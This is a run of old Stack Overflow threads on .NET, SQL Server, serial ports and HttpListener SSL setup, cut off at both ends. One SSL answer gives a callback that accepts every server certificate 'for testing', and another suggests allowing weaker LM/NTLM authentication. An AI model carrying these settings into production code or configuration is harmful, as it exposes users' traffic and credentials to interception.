A: Ideally, runtime exceptions should not be thrown. A checked exception (business exception) should be created for your scenario, because if either of these exceptions is thrown and logged, it misguides the developer going through the logs. Business exceptions, by contrast, do not create that panic and are usually ignored while troubleshooting logs.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3881",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "568"
} |
Q: T-Sql Remove Decimal Point From Money Data Type Given the constraint of only using T-Sql in Sql Server 2005, is there a better way to remove the decimal point from a money datatype than a conversion to a varchar (here implicitly) and then a replace of the decimal point?
Here is what I have currently.
SELECT REPLACE(1.23, '.', ''), REPLACE(19.99, '.', '')
Which returns the desired 123 and 1999, but I was wondering if there was a better way. Any thoughts?
A: Multiply by 100 and then convert to an int.
A: You should never ever use the money datatype to store monetary values. If you do any calculations you will get truncated results. Run the following to see what I mean
DECLARE
@mon1 MONEY,
@mon2 MONEY,
@mon3 MONEY,
@mon4 MONEY,
@num1 DECIMAL(19,4),
@num2 DECIMAL(19,4),
@num3 DECIMAL(19,4),
@num4 DECIMAL(19,4)
SELECT
@mon1 = 100, @mon2 = 339, @mon3 = 10000,
@num1 = 100, @num2 = 339, @num3 = 10000
SET @mon4 = @mon1/@mon2*@mon3
SET @num4 = @num1/@num2*@num3
SELECT @mon4 AS moneyresult,
@num4 AS numericresult
Output:
2949.0000 2949.8525
A: Could you be a little more specific about the use case? Removing the decimal point from the representation is a little unusual given that you'll lose all information about the scale. Are you assuming that there will always be two digits? If so, you could simply multiply by 100 and then round before converting to a string.
A: Keep in mind that the money data type can have up to 4 digits past the decimal. Values with more than two digits past the decimal might not work as expected with either your original solution or the x100 trick.
A: Here is the magic:
DataFormatString="{0:c0}"
This will remove the decimal places.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3894",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "10"
} |
Q: Is this a good way to determine OS Architecture? Since the WMI class Win32_OperatingSystem only includes OSArchitecture in Windows Vista, I quickly wrote up a method using the registry to try and determine whether or not the current system is a 32 or 64bit system.
private Boolean is64BitOperatingSystem()
{
    // Dispose the registry key when we're done with it
    using (RegistryKey localEnvironment = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment"))
    {
        String processorArchitecture = (String) localEnvironment.GetValue("PROCESSOR_ARCHITECTURE");
        if (processorArchitecture.Equals("x86")) {
            return false;
        }
        else {
            return true;
        }
    }
}
It's worked out pretty well for us so far, but I'm not sure how much I like looking through the registry. Is this a pretty standard practice or is there a better method?
Edit: Wow, that code looks a lot prettier in the preview. I'll consider linking to a pastebin or something, next time.
A: Take a look at Raymond Chen's solution:
How to detect programmatically whether you are running on 64-bit Windows
and here's the PINVOKE for .NET:
IsWow64Process (kernel32)
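Here's roughly what that looks like combined with the IntPtr.Size shortcut (a minimal sketch - it assumes XP SP2 or later, where kernel32 exports IsWow64Process; older versions would need a GetProcAddress probe first):

using System;
using System.Runtime.InteropServices;

static class OsBitness
{
    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool IsWow64Process(IntPtr hProcess, [MarshalAs(UnmanagedType.Bool)] out bool wow64Process);

    public static bool Is64BitOperatingSystem()
    {
        // A 64-bit process can only be running on a 64-bit OS
        if (IntPtr.Size == 8)
            return true;

        // A 32-bit process is on a 64-bit OS exactly when it runs under WOW64
        bool isWow64;
        return IsWow64Process(System.Diagnostics.Process.GetCurrentProcess().Handle, out isWow64) && isWow64;
    }
}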
Update: I'd take issue with checking for 'x86'. Who's to say what Intel's or AMD's next 32-bit processor may be designated as? The probability is low, but it is a risk. You should ask the OS to determine this via the correct APIs, not by querying what could be an OS version/platform-specific value that may be considered opaque to the outside world. Ask yourself the questions: 1 - is the registry entry concerned properly documented by MS, and 2 - if it is, do they provide a definitive list of possible values that is guaranteed to permit you as a developer to make the informed decision between whether you are running 32-bit or 64-bit? If the answer is no, then call the APIs. Yeah, it's a bit more long-winded, but it is documented and definitive.
A:
The easiest way to test for 64-bit under .NET is to check the value of IntPtr.Size.
I believe the value of IntPtr.Size is 4 for a 32-bit app that's running under WOW, isn't it?
Edit: @Edit: Yeah. :)
A: Looking into the registry is perfectly valid, so long as you can be sure that the user of the application will always have access to what you need.
A: The easiest way to test for 64-bit under .NET is to check the value of IntPtr.Size.
EDIT: Doh! This will tell you whether or not the current process is 64-bit, not the OS as a whole. Sorry!
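Note for later readers: if you can target .NET 4 or newer, the framework exposes both checks directly, which sidesteps the whole process-vs-OS confusion:

bool osIs64Bit = Environment.Is64BitOperatingSystem; // the OS itself
bool processIs64Bit = Environment.Is64BitProcess;    // just this process; false under WOW64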
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3903",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: What Are Some Good .NET Profilers? What profilers have you used when working with .net programs, and which would you particularly recommend?
A: I've been working with JetBrains dotTrace for WinForms and Console Apps (not tested on ASP.net yet), and it works quite well:
They recently also added a "Personal License" that is significantly cheaper than the corporate one. Still, if anyone else knows some cheaper or even free ones, I'd like to hear as well :-)
A: Others have covered performance profiling, but with regards to memory profiling
I'm currently evaluating both the Scitech .NET Memory Profiler 3.1 and ANTS Memory Profiler 5.1 (current versions as of September 2009). I tried the JetBrains one a year or two ago and it wasn't as good as ANTS (for memory profiling) so I haven't bothered this time. From reading the web sites it looks like it doesn't have the same memory profiling features as the other two.
Both ANTS and the Scitech memory profiler have features that the other doesn't, so which is best will depend upon your preferences. Generally speaking, the Scitech one provides more detailed information while the ANTS one is really incredible at identifying the leaking object. Overall, I prefer the ANTS one because it is so quick at identifying possible leaks.
Here are the main the pros and cons of each from my experience:
Common Features of ANTS and Scitech .NET Memory Profiler
*
*Real-time analysis feature
*Excellent how-to videos on their web sites
*Easy to use
*Reasonably performant (obviously slower than without the profiler attached, but not so much you become frustrated)
*Show instances of leaking objects
*Basically they both do the job pretty well
ANTS
*
*One-click filters to find common leaks including: objects kept alive only by event handlers, objects that are disposed but still live and objects that are only being kept alive by a reference from a disposed object. This is probably the killer feature of ANTS - finding leaks is incredibly fast because of this. In my experience, the majority of leaks are caused by event handlers not being unhooked and ANTS just takes you straight to these objects. Awesome.
*Object retention graph. While the same info is available in Scitech, it's much easier to interpret in ANTS.
*Shows size with children in addition to size of the object itself (but only when an instance is selected unfortunately, not in the overall class list).
*Better integration to Visual Studio (right-click on graph to jump to file)
Scitech .NET Memory Profiler
*
*Shows stack trace when object was allocated. This is really useful for objects that are allocated in lots of different places. With ANTS it is difficult to determine exactly where the leaked object was created.
*Shows count of disposable objects that were not disposed. While not indicative of a leak, it does identify opportunities to fix this problem and improve your application performance as a result of faster garbage collection.
*More detailed filtering options (several columns can be filtered independently).
*Presents info on total objects created (including those garbage collected). ANTS only shows 'live' object stats. This makes it easier to analyze and tune overall application performance (e.g. identify where lots of objects are being created unnecessarily that aren't necessarily leaking).
By way of summary, I think ANTS helps you find what's leaking faster while Scitech provides a bit more detail about your overall application memory performance and individual objects once you know what to look at (eg. stack trace on creation). If the stack trace and tracking of undisposed disposable objects was added to ANTS I wouldn't see the need to use anything else.
A: Don't forget the awesome scitech .net memory profiler
It's great for tracking down why your .net app is running out of memory.
A: I would add that dotTrace's ability to diff memory and performance trace sessions is absolutely invaluable (ANTS may also have a memory diff feature, but I didn't see a performance diff).
Being able to run a profiling session before and after a bug fix or enhancement, then compare the results is incredibly valuable, especially with a mammoth legacy .NET application (as in my case) where performance was never a priority and where finding bottlenecks could be VERY tedious. Doing a before-and-after diff allows you to see the change in call count for each method and the change in duration for each method.
This is helpful not only during code changes, but also if you have an application that uses a different database, say, for each client/customer. If one customer complains of slowness, you can run a profiling session using their database and compare the results with a "fast" database to determine which operations are contributing to the slowness. Of course there are many database-side performance tools, but sometimes it really helps to see the performance metrics from the application side (since that's closer to what the user's actually seeing).
Bottom line: dotTrace works great, and the diff is invaluable.
A: I recently discovered EQATEC Profiler http://www.eqatec.com/tools/profiler. It works with most .NET versions and on a bunch of platforms. It is easy to use and parts of it is free, even for commercial use.
A: AQTime is reasonable, but has a bit of a learning curve and isn't as easy to use as the built-in one in Team Suite.
A: [Full Disclosure]
While not yet as full-featured as some of the other .NET memory profilers listed here, there is a new entry on the market called JustTrace. It's made by Telerik and its primary goal is to make tracing/profiling easier and faster to do for all types of apps (web/Silverlight/desktop).
If you've ever found profiling and optimization intimidating or slow with other tools, then JustTrace might be worth a look.
A: In the past, I’ve used the profiler that ships with Visual Studio Team System.
A: The current release of SharpDevelop (3.1.1) has a nice integrated profiler. It's quite fast, and integrates very well into the SharpDevelop IDE and its NUnit runner. Results are displayed in a flexible Tree/List style (use LINQ to create your own selection). Double-clicking the displayed method jumps directly into the source code.
A: I have used JetBrains dotTrace and Redgate ANTS extensively. They are fairly similar in features and price. They both offer useful performance profiling and quite basic memory profiling.
dotTrace integrates with Resharper, which is really convenient, as you can profile the performance of a unit test with one click from the IDE. However, dotTrace often seems to give spurious results (e.g. saying that a method took several years to run)
I prefer the way that ANTS presents the profiling results. It shows you the source code and to the left of each line tells you how long it took to run. dotTrace just has a tree view.
EQATEC profiler is quite basic and requires you to compile special instrumented versions of your assemblies which can then be run in the EQATEC profiler. It is, however, free.
Overall I prefer ANTS for performance profiling, although if you use Resharper then the integration of dotTrace is a killer feature and means it beats ANTS in usability.
The free Microsoft CLR Profiler (.Net framework 2.0 / .Net Framework 4.0) is all you need for .NET memory profiling.
2011 Update:
The Scitech memory profiler has quite a basic UI but lots of useful information, including some information on unmanaged memory which dotTrace and ANTS lack - you might find it useful if you are doing COM interop, but I have yet to find any profiler that makes COM memory issues easy to diagnose - you usually have to break out windbg.exe.
The ANTS profiler has come on in leaps and bounds in the last few years, and its memory profiler has some truly useful features which now pushed it ahead of dotTrace as a package in my estimation. I'm lucky enough to have licenses for both, but if you are going to buy one .Net profiler for both performance and memory, make it ANTS.
A: Don't forget nProf - a perfectly good, freeware profiler.
A: I've worked with RedGate's profiler in the past. Did the job for me.
A: Haven't tried it myself, but maybe dotTrace? Their ReSharper application is certainly a good one. Maybe dotTrace is too :)
A: I doubt that the profiler which comes with Visual Studio Team System is the best profiler, but I have found it to be good enough on many occasions. What specifically do you need beyond what VS offers?
EDIT: Unfortunately it is only available in VS Team System, but if you have access to that it is worth checking out.
A: The latest version of ANTS memory profiler (I think it's 5) simply rocks!!! I was haunting a leak using WinDbg and SOS since it proved to be the best way before, then I tried ANTS and I got it in minutes. Really a wonderful piece of software.
A: I would like to add the YourKit Java and .NET profilers. I love it for Java; I haven't tried the .NET version though.
A: I have found dotTrace Profiler by JetBrains to be an excellent profiling tool for .NET and their ASP.NET mode is quality.
A: ANTS Profiler. I haven't used many, but I don't really have any complaints about ANTS. The visualization is really helpful.
A: AutomatedQA AQTime for timing and SciTech MemProfiler for memory.
A: If you're looking for something quick, easy, and free, http://code.google.com/p/slimtune/ seems to do the job fine.
A: Unfortunately, most of the profilers I tried failed when used with tail calls, most notably ANTS. I just ended up writing my own. There is a simple implementation on CodeProject that you can use as a base.
A: Intel® VTune™ Performance Analyzer for quick sampling
A: I must bring to your notice an amazing tool which I used some time back: AVICode Interceptor Studio. In my previous company we used this wonderful tool to profile the web application (this is supposed to be the single largest web application in the world and the largest civilian IT project ever done). The performance team did wonders with the help of this magnificent tool. It is a pain to configure, but that is a one-time activity and I would say it is worth the time. Checkout this page for details.
Thanks,
James
A: For me, SpeedTrace is the best tool on the market because it not only helps you find bottlenecks inside your applications, it also helps you in troubleshooting scenarios to find out why your application crashed, your setup did not install, your application hung, or your application performance is sometimes poor depending on the data input, e.g. to identify slow DB transactions.
A: The NuMega True Time profiler lives on in DevPartner Studio by Micro Focus. It provides line and method level detail for .NET apps requiring only PDBs, no source needed (but it helps.) It can discriminate between algorithmically heavy routines versus those with long I/O waits using our proprietary per thread kernel mode timing driver. Version 10.5 ships with new 64-process support on February 4, 2011. Shameless plug: I work on the DevPartner product line. Follow up at http://www.DevPartner.com for news of the 10.5 launch.
Disclaimer: I am the Product Manager for DevPartner at Micro Focus.
A: I've been testing Telerik's JustTrace recently and although it is well away from a finished product the guys are going in the right direction.
A: If Licensing is an issue you could try WINDBG for memory profiling
A: I've found plenty of problems in a big C# app using this.
Usually the problem occurs during startup or shutdown as plugins are being loaded, and big data structures are being created, destroyed, serialized, or deserialized. Often they are created and initialized more than once, and change handlers get added multiple times, further compounding the problem.
In cases like this, the program can be so sluggish that only 2 samples are sufficient to pinpoint the guilty method / function / property call sites.
A: We selected YourKit Profiler for .NET in my company as it was the best value (price vs. features). For a small company that wants to have flexible licensing (floating licenses) it was a perfect choice - ANTS was locked to a developer seat at the time.
Also, it provided us with the ability to attach to the running process which was not possible with dotTrace. Beware though that attaching is not the best option as everything .NET will slow down, but this was the only way to profile .NET applications started by other processes.
Feature wise, ANTS and dotTrace were better - but in the end YourKit was good enough.
A: If you're on ASP.NET MVC, you can try MVCMiniProfiler (http://benjii.me/2011/07/using-the-mvc-mini-profiler-with-entity-framework/)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3927",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "373"
} |
Q: What's the best way to find long-running code in a Windows Forms Application I inherited a Windows Forms app written in VB.Net. Certain parts of the app run dreadfully slow. What's the easiest way to find which parts of the code are holding things up? I'm looking for a way to quickly find the slowest subroutines and tackle them first in an attempt to speed up the app.
I know that there are several code profiler products available for purchase which will show how long each subroutine takes, but I was hoping to find a free solution.
A: I appreciate the desire to find free software. However, in this case, I would strongly recommend looking at all options, including commercial products. I tried to play with nProf (which is at version 0.1 I think) and didn't have much luck. Even so, performance profiling an application is a subtle business and is best approached using a powerful, flexible tool. Unless you are working for free, I strongly believe the time you will save using a professional product will far outweigh the cost of a license. And of course, if you are only wanting to profile a single application, each commercial package has a 15 or 30 day trial, more than enough time to pinpoint any issues in an existing application. And if you need profiling support for more than just the one-off project, you're better buying a full strength tool anyway.
We use the ANTS profiler from RedGate and have been very happy with it. I have also used .NET Memory Profiler with excellent results. The cool thing about .NET Memory Profiler is that it can attach to and profile running production applications, which really saved our butts when we had a memory leak in production we couldn't reproduce in our test lab.
The JetBrains folks have a profiler as well called dotTrace which I haven't tried, but I have to believe that if it comes from the JetBrains shop it is probably top notch as well.
Anyway, my advice is this: try to fix your app within the free trial window of one or an aggregated combination of the three of them (minimum of 45 days free use) and if that isn't enough time, pick your favorite and spring for one of them. You won't be sorry.
A: nProf is a free .Net profiler (ref).
A: nProf is a good, free tool for .Net Profiling.
A: Visual Studio also comes with a performance profiler which is pretty good. it doesn't come with all versions - for VS2008, I think it is the Developer Edition you need.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3942",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "8"
} |
Q: How do I know which SQL Server 2005 index recommendations to implement, if any? We're in the process of upgrading one of our SQL Server instances from 2000 to 2005. I installed the performance dashboard (http://www.microsoft.com/downloads/details.aspx?FamilyId=1d3a4a0d-7e0c-4730-8204-e419218c1efc&displaylang=en) for access to some high level reporting. One of the reports shows missing (recommended) indexes. I think it's based on some system view that is maintained by the query optimizer.
My question is what is the best way to determine when to take an index recommendation. I know that it doesn't make sense to apply all of the optimizer's suggestions. I see a lot of advice that basically says to try the index and to keep it if performance improves and to drop it if performances degrades or stays the same. I wondering if there is a better way to make the decision and what best practices exist on this subject.
A: First thing to be aware of:
When you upgrade from 2000 to 2005 (by using detach and attach) make sure that you:
*
*Set compatibility to 90
*Rebuild the indexes
*Run update statistics with full scan
If you don't do this you will get suboptimal plans.
IF the table is mostly written to, you want as few indexes as possible.
IF the table is used for a lot of read queries, you have to make sure that the WHERE clauses are covered by indexes.
A: The advice you got is right. Try them all, one by one.
There is NO substitute for testing when it comes to performance. Unless you prove it, you haven't done anything.
A: You're best off researching the most common types of queries that happen on your database and creating indexes based on that research.
For example, if there is a table which stores website hits, which is written to very often but hardly ever read from, then don't index the table at all.
If, however, you have a list of users which is accessed more often than it is written to, then I would first create a clustered index on the column that is accessed the most, usually the primary key. I would then create an index on commonly searched columns, and those which are used in ORDER BY clauses.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3975",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: Programmatically talking to a Serial Port in OS X or Linux I have a Prolite LED sign that I'd like to set up to show scrolling search queries from Apache logs and other fun statistics. The problem is, my G5 does not have a serial port, so I have to use a USB-to-serial dongle. It shows up as /dev/cu.usbserial and /dev/tty.usbserial.
When i do this everything seems to be hunky-dory:
stty -f /dev/cu.usbserial
speed 9600 baud;
lflags: -icanon -isig -iexten -echo
iflags: -icrnl -ixon -ixany -imaxbel -brkint
oflags: -opost -onlcr -oxtabs
cflags: cs8 -parenb
Everything also works when I use the serial port tool to talk to it.
If I run this piece of code while the above-mentioned serial port tool is open, everything also works. But as soon as I disconnect the tool the connection gets lost.
#!/usr/bin/python
import serial
ser = serial.Serial('/dev/cu.usbserial', 9600, timeout=10)
ser.write("<ID01><PA> \r\n")
read_chars = ser.read(20)
print read_chars
ser.close()
So the question is, what magicks do I need to perform to start talking to the serial port without the serial port tool? Is that a permissions problem? Also, what's the difference between /dev/cu.usbserial and /dev/tty.usbserial?
Nope, no serial numbers. The thing is, the problem persists even with sudo-running the python script, and the only thing that makes it go through is if I open the connection in the GUI tool that I mentioned.
A: /dev/cu.xxxxx is the "callout" device, it's what you use when you establish a connection to the serial device and start talking to it. /dev/tty.xxxxx is the "dialin" device, used for monitoring a port for incoming calls for e.g. a fax listener.
A: Have you tried watching the traffic between the GUI and the serial port to see if there is some kind of special command being sent across? Also, just curious: Python is sending ASCII and not UTF-8 or something else, right? The reason I ask is because I noticed the quote characters change between your strings, and in some encodings that actually is the difference between ASCII and UTF-8.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3976",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "20"
} |
Q: Multi-Paradigm Languages In a language such as (since I'm working in it now) PHP, which supports procedural and object-oriented paradigms.
Is there a good rule of thumb for determining which paradigm best suits a new project? If not, how can you make the decision?
A: If you're doing something for yourself, or if you're doing just a prototype, or testing an idea... use the free style that script languages give you.
After that: always think in objects, try to organize your work around the OO paradigm even if you're writing procedural stuff. Then, refactorize, refactorize, refactorize.
A: It all depends on the problem you're trying to solve. Obviously you can solve any problem in either style (procedural or OO), but you usually can figure out in the planning stages before you start writing code which style suits you better.
Some people like to write up use cases and if they see a lot of the same nouns showing up over and over again (e.g., a person withdraws money from the bank), then they go the OO route and use the nouns as their objects. Conversely, if you don't see a lot of nouns and there's really more verbs going on, then procedural or functional may be the way to go.
Steve Yegge has a great but long post as usual that touches on this from a different perspective that you may find helpful as well.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3978",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: TestDriven.NET is not running my SetUp methods for MbUnit I've created some MbUnit Test Fixtures that have SetUp methods marked with the SetUp attribute. These methods run before the tests just fine using the MbUnit GUI, the console runner, and the ReSharper MbUnit plugin. However, when I run the tests with TestDriven.NET it does not run the SetUp methods at all.
Does anyone know if this is a bug with TestDriven.NET or if I have something setup wrong?
A: No longer an issue with recent versions of Gallio since v3.0.4. Just make sure to use the 64-bit installer.
A: After having this problem for weeks on Vista 64, I found a post by Dave Bouwman just today, and it fixed this problem.
A: I had this exact same issue after installing NUnit using nuget ... previously I had been using an older version of NUnit and everything had worked fine.
I think TestDriven is not compatible with the latest version of NUnit.
I've switched to using NCrunch, which is free, and compiles/runs tests in the backgound as you are coding, amongst other things. Highly recommended.
A: I came across a similar issue with NUnit and TestDriven.NET that took me hours to figure out.
I installed the Visual Studio extension below, and it hit breakpoints in the tests but skipped the one in the [TestFixtureSetUp].
It turned out that I also needed the actual TestDriven.NET software to be installed at C:\Program Files (x86)\TestDriven.NET 4
This is available from https://www.testdriven.net/download.aspx
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3984",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: How do I configure a Vista Ultimate (64bit) account so it can access a SMB share on OSX? I have Windows File sharing enabled on an OS X 10.4 computer. It's accessible via \rudy\myshare for all the Windows users on the network, except for one guy running Vista Ultimate 64-bit edition.
All the other users are running Vista or XP, all 32-bit. All the workgroup information is the same, all login with the same username/password.
The Vista 64 guy can see the Mac on the network, but his login is rejected every time.
Now, I imagine that Vista Ultimate is has something configured differently to the Business version and XP but I don't really know where to look. Any ideas?
A: Try changing the local security policy on that Vista box for "Local Policies\Security Options\Network Security: LAN manager authentication level" from “Send NTLMv2 response only” to “Send LM & NTLM - use NTLMv2 session security if negotiated”.
A: No, I have successfully done this with my Vista 64-bit machine. You may want to try using the IP address of the machine and try connecting that way. Or maybe check out the log files on the Mac to see what the rejection error was.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3996",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "10"
} |
Q: How do I add SSL to a .net application that uses httplistener - it will *not* be running on IIS Most recent edits in bold
I am using the .net HttpListener class, but I won't be running this application on IIS and am not using ASP.net. This web site describes what code to actually use to implement SSL with asp.net and this site describes how to set up the certificates (although I'm not sure if it works only for IIS or not).
The class documentation describes various types of authentication (basic, digest, Windows, etc.) --- none of them refer to SSL. It does say that if HTTPS is used, you will need to set a server certificate. Is this going to be a one line property setting and HttpListener figures out the rest?
In short, I need to know how to set up the certificates and how to modify the code to implement SSL.
Although it doesn't occur when I'm trying to access HTTPS, I did notice an error in my System Event log - the source is "Schannel" and the content of the message is:
A fatal error occurred when attempting
to access the SSL server credential
private key. The error code returned
from the cryptographic module is
0x80090016.
Edit:
Steps taken so far
*
*Created a working HTTPListener in C# that works for HTTP connections (e.g. "http://localhost:8089/foldername/")
*Created a certificate using makecert.exe
*Added the certificate to be trusted using certmgr.exe
*Used Httpcfg.exe to listen for SSL connections on a test port (e.g. 8090)
*Added port 8090 to the HTTPListener via listener.Prefixes.Add("https://localhost:8090/foldername/");
*tested an HTTP client connection, e.g. ("http://localhost:8089/foldername/") in a browser and received the correct response
*tested an HTTPS client connection, e.g. ("https://localhost:8090/foldername/") in a browser and received "Data Transfer Interrupted" (in Firefox)
*debugging in visual studio shows that the listener callback that receives the requests never gets hit when the HTTPS connection starts - I don't see any place that I could set a breakpoint to catch anything else earlier.
*netstat shows that listening ports are open for both HTTPS and HTTP. The HTTPS port does go to TIME_WAIT after a connection is attempted.
*Fiddler and HTTPAnalyzer don't catch any of the traffic, I guess it doesn't get far enough in the process to show up in those HTTP analysis tools
Questions
*
*What could the problem be?
*Is there a piece of .Net code I am missing (meaning I have to do more in C# other than simply add a prefix to the listener that points to HTTPS, which is what I have done)?
*Have a missed a configuration step somewhere?
*What else might I do to analyze the problem?
*Is the error message in the System Event log a sign of the problem? If so how would it be fixed?
A: You just have to bind a certificate to an ip:port and then open your listener with an https:// prefix. 0.0.0.0 applies to all IPs, appid is any random GUID, and certhash is the hash of the certificate (sometimes called a thumbprint).
Run the following with cmd.exe using administrator privileges.
netsh http add sslcert ipport=0.0.0.0:1234 certhash=613bb67c4acaab06def391680505bae2ced4053b appid={86476d42-f4f3-48f5-9367-ff60f2ed2cdc}
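If you'd rather not copy the hash out of a certificate dialog by hand, you can also read it from the store in code - a small sketch that just lists subject and thumbprint for everything in LocalMachine\My:

using System;
using System.Security.Cryptography.X509Certificates;

X509Store store = new X509Store(StoreName.My, StoreLocation.LocalMachine);
store.Open(OpenFlags.ReadOnly);
foreach (X509Certificate2 cert in store.Certificates)
    Console.WriteLine("{0} -> {1}", cert.Subject, cert.Thumbprint); // Thumbprint already has no spaces
store.Close();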
If you want to create a self-signed certificate to test this,
*
*Open IIS
*Click on your computer name
*Click Server Certificates icon
*Click generate Self-Signed certificate
*Double click and go to details
*You will see the thumbprint there, just remove the spaces.
using System;
using System.IO;
using System.Net;

HttpListener listener = new HttpListener();
listener.Prefixes.Add("https://+:1234/");
listener.Start();
Console.WriteLine("Listening...");
HttpListenerContext context = listener.GetContext();
using (Stream stream = context.Response.OutputStream)
using (StreamWriter writer = new StreamWriter(stream))
writer.Write("hello, https world");
Console.ReadLine();
After running this program I just navigated to https://localhost:1234 to see the text printed. Since the certificate CN does not match the URL and it is not in the Trusted Certificate store, you will get a certificate warning. The text is encrypted, however, as you can verify with a tool like Wireshark.
If you want more control over creating a self-signed x509 certificate, openssl is a great tool and there is a port for Windows. I've had a lot more success with it than with the makecert tool.
It's also very important that, if you are communicating from code with an https service that has an SSL warning, you set up the certificate validator on the ServicePointManager to bypass it for testing purposes.
ServicePointManager.ServerCertificateValidationCallback += (sender, cert, chain, errors) => true;
A: I don't have it entirely implemented yet, but this web site seems to give a good walkthrough of setting up the certificates and the code.
A: Here is an alternative way to bind the SSL certificate to the IP/PORT combination without using httpcfg.exe (XP) or netsh.exe (Vista+).
http://dotnetcodebox.blogspot.com.au/2012/01/how-to-work-with-ssl-certificate.html
The gist of it is that you can use the HttpSetServiceConfiguration C++ API built into Windows to do it programmatically rather than via the command line, hence removing the dependency on the OS version and on having httpcfg installed.
A: The class documentation
has this note:
If you create an HttpListener using
https, you must select a Server
Certificate for that listener.
Otherwise, an HttpWebRequest query of
this HttpListener will fail with an
unexpected close of the connection.
and this:
You can configure Server Certificates
and other listener options by using
HttpCfg.exe. See
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/http/http/httpcfg_exe.asp
for more details. The executable is
shipped with Windows Server 2003, or
can be built from source code
available in the Platform SDK.
Is the first note explained by the second? As outlined in the question, I used httpcfg.exe to bind the certificate to a specific port. If they intend something other than this, the note is ambiguous.
A: I've encountered the same issue as you. Fortunately, after googling hard, the steps on this page made SSL work with my HttpListener.
A: I have a similar problem, and it seems that there could be a problem with certificate itself.
Here's the path that worked for me:
makecert.exe -r -a sha1 -n CN=localhost -sky exchange -pe -b 01/01/2000 -e 01/01/2050 -ss my -sr localmachine
then look up the certificate thumbprint, copy it to the clipboard, and remove the spaces. This will be the parameter after -h in the next command:
HttpCfg.exe set ssl -i 0.0.0.0:801 -h 35c65fd4853f49552471d2226e03dd10b7a11755
then run a service host on https://localhost:801/ and it works perfectly.
what I cannot make work is for https to run on a self-generated certificate. Here's the code I run to generate one (error handling taken out for clarity):
LPCTSTR pszX500 = subject;
BYTE *pbEncoded = NULL;
DWORD cbEncoded = 0;
// First call computes the required buffer size; second call encodes the X.500 name
CertStrToName(X509_ASN_ENCODING, pszX500, CERT_X500_NAME_STR, NULL, NULL, &cbEncoded, NULL);
pbEncoded = (BYTE *)malloc(cbEncoded);
CertStrToName(X509_ASN_ENCODING, pszX500, CERT_X500_NAME_STR, NULL, pbEncoded, &cbEncoded, NULL);
// Prepare certificate Subject for self-signed certificate
CERT_NAME_BLOB SubjectIssuerBlob;
memset(&SubjectIssuerBlob, 0, sizeof(SubjectIssuerBlob));
SubjectIssuerBlob.cbData = cbEncoded;
SubjectIssuerBlob.pbData = pbEncoded;
// Prepare key provider structure for self-signed certificate
CRYPT_KEY_PROV_INFO KeyProvInfo;
memset(&KeyProvInfo, 0, sizeof(KeyProvInfo));
KeyProvInfo.pwszContainerName = _T("my-container");
KeyProvInfo.pwszProvName = NULL;
KeyProvInfo.dwProvType = PROV_RSA_FULL;
KeyProvInfo.dwFlags = CRYPT_MACHINE_KEYSET;
KeyProvInfo.cProvParam = 0;
KeyProvInfo.rgProvParam = NULL;
KeyProvInfo.dwKeySpec = AT_SIGNATURE;
// Prepare algorithm structure for self-signed certificate
CRYPT_ALGORITHM_IDENTIFIER SignatureAlgorithm;
memset(&SignatureAlgorithm, 0, sizeof(SignatureAlgorithm));
SignatureAlgorithm.pszObjId = szOID_RSA_SHA1RSA;
// Prepare Expiration date for self-signed certificate
SYSTEMTIME EndTime;
GetSystemTime(&EndTime);
EndTime.wYear += 5;
// Create self-signed certificate
pCertContext = CertCreateSelfSignCertificate(NULL, &SubjectIssuerBlob, 0, &KeyProvInfo, &SignatureAlgorithm, 0, &EndTime, 0);
hStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, 0, 0, CERT_SYSTEM_STORE_LOCAL_MACHINE, L"MY");
CertAddCertificateContextToStore(hStore, pCertContext, CERT_STORE_ADD_REPLACE_EXISTING, 0);
The certificate shows up fine and it has a working private key, but https will time out as if the thumbprint was never registered. If anyone knows why - please comment.
EDIT1: After some playing around, I have found the initialization for CertCreateSelfSignCertificate which generates a proper certificate:
CRYPT_KEY_PROV_INFO KeyProvInfo;
memset(&KeyProvInfo, 0, sizeof(KeyProvInfo));
KeyProvInfo.pwszContainerName = _T("my-container");
KeyProvInfo.pwszProvName = _T("Microsoft RSA SChannel Cryptographic Provider");
KeyProvInfo.dwProvType = PROV_RSA_SCHANNEL;
KeyProvInfo.dwFlags = CRYPT_MACHINE_KEYSET;
KeyProvInfo.cProvParam = 0;
KeyProvInfo.rgProvParam = NULL;
KeyProvInfo.dwKeySpec = AT_KEYEXCHANGE;
| {
"language": "en",
"url": "https://stackoverflow.com/questions/4004",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "43"
} |
Q: Multiple languages in an ASP.NET MVC application? What is the best way to support multiple languages for the interface in an ASP.NET MVC application? I've seen people use resource files for other applications. Is this still the best way?
A: If you're using the default view engines, then local resources work in the views. However, if you need to grab resource strings within a controller action, you can't get local resources, and have to use global resources.
This makes sense when you think about it because local resources are local to an aspx page and in the controller, you haven't even selected your view.
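For example, from a controller action you have to go through the global resource API - a sketch, where "Site" and "WelcomeMessage" are hypothetical resource class and key names:

public ActionResult Index()
{
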